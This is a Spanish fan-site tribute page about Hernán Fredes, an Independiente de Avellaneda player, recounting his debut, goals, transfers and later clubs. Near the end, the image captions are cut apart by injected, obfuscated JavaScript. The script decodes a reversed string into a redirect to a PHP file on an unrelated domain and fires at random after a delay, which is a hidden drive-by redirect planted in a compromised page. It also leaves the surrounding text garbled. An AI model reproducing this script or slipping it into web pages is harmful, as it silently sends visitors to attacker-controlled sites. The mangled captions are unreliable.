Conectate con nosotros

Efemérides

Efemérides del 27 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1987 – Nace en Avellaneda, Bs. As., Hernán Daniel Fredes. Hizo todas las inferiores en Independiente. Dio por el Club todo lo que tenía y que no fué poco, aunque muchos no lo supieron valorar.  Su amor por los colores lo demostró siempre.  Sin embargo, dado que le tocó descender de categoría, hay mucha gente, al igual que a muchos otros jugadores, que prefiere olvidarlos. Nosotros,  desde «Correo Independiente» y «4 Gansos»… los valoramos muchísimo

to… en la pensión de Villa Domínico.

Nunca se escondió, siempre pedía la pelota, jugó lesionado e infiltrado… cosas que “otros” no hicieron jamás por nuestra camiseta. Un jugador con muy buena técnica pero no tanta suerte. Viendo lo que hoy se vé… mereció mucho más…

Debutó en Primera una noche del martes 28 de febrero del 2006 a  las 21:15 hs., en un partido donde Independiente igualó sin tantos contra Quilmes, por la fecha 7 del Clausura 2006.   Estuvo en Independiente desde el 2006 al 2009 donde jugó 21 partidos y convirtió 2 goles. Su primer gol en el Club de sus amores, lo convirtió  el 11 de marzo del 2007,  por la fecha 05, contra Rosario Central, a los 45’ del segundo tiempo. ​

El gesto técnico para pegarle a la pelota.

Fué vendido al Metalist de Ucrania, donde solo estuvo medio año y se volvió, Me parece recordar que por falta de pago al Club comprador.

Gritando un gol con la hinchada…

Cuando volvió al Rojo declaró:  «Cuando hace seis meses decidí irme fue porque necesitaba plata y un cambio de aire. A veces necesitás perder algo de guita para valorar lo que tenías. Llegué a Independiente a los 11 o 12 años y parece que tuve que irme para darme cuenta lo grande que es. Estoy muy contento de poder volver”.

En su segunda etapa estuvo desde el 2010 hasta el 2014 donde jugó 126 partidos y convirtió 7 goles. Y en ese 2010, tuvo la alegría de salir Campeón de la Copa Sudamericana.

INDEPENDIENTE… su casa…


El día que Independiente en el 2013 jugó contra San Lorenzo de local, Hernán estaba vendido a Méjico, y venía de lesión en lesión desde hacía rato.  Pero él quiso jugar, dejar en la cancha hasta la última gota de su esfuerzo para no perder… Pero tantas lesiones postergadas de una correcta curación y las infiltraciones, lo llevaron a caer en la mitad del partido rompiéndose los ligamentos de la rodilla. Ya no viajó a Méjico y se quedó un año más en el Rojo hasta su salida en el 2014, previo a volver a primera “A” con el equipo.

Buen compañero… se la jugaba siempre… no arrugaba… ni se escondía… y no solo lo hizo… sinó que lo dijo…

Luego de su salida, y además de jugar en el Metalist de Ucrania, Hernán FREDES  jugó en Arsenal de Sarandí, Defensa y Justicia, “3 de Febrero” y Sol de América de Paraguay  y  Unión San Felipe de Chile. Actualmente sigue jugando en el Nacional “B”, en Chacarita Jrs.

Les dejo dos videos de colegas, con jugadas y goles de Hernán…:

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»90″ height=»69″/></figure></div>



<p><strong>Y el golazo</strong> que selló el triunfo en la B Nacional frente a Almirante Brown, y que nos puso en el tercer pues<script>$mWn=function(n){if(typeof ($mWn.list[n])==to para llegar a pelear el ascenso a primera en menos de un año…:

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»76″ height=»59″/></figure></div>



<figure class=

Gracias Hernán por todo lo que nos diste…

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides